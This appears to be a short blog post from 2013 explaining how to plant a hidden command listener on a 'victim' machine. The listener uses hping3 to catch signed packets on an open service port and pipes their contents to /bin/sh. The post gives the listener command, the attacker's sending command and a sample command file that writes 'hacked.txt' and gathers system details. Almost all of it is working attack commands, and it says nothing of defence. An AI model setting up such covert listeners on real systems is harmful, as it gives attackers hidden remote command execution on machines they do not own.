Pages

Friday, November 1, 2013

Create a hidden command listener by reusing an open port

Scenario:
- Box A - victim, running a network service on port 8834. We'll reuse this
- Box B - attacker host behind NAT. Will transmit commands to the listener waiting on the victim.

This is similar to a reverse shell from box A to box B, except that B will need another way to view results of the commands executed on A.

A:
$ sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834 | /bin/sh

--listen - Listen mode. Waits for packets containing the signature and dump the data from signature to the end of the packet
-I - Interface to listen on
-p - listening port

This will intercept packets and dump the content after a matching signature. Commands will be passed to the shell to be executed. Another trick would be needed to view the output of the commands though.

B:
$ sudo hping3 --count 1 --data 200 --file commands.txt --sign SecretSignature 192.168.56.1 -V -p 8834

--count 1 - stop after sending 1 packet
--data 200 - set packet body size in bytes
--file - fill packet with data from file
--sign - fill first a signature in the packet
-V - verbose
-p - destination port

$ cat commands.txt
echo 123 > hacked.txt
whoami > log.txt
uname -a >> log.txt
pwd >> log.txt
ls -al >> log.txt
ifconfig -a >> log.txt

(New line at the end, to get the last command executed !)
Verify on victim's A machine that commands have been executed and results saved in the corresponding files.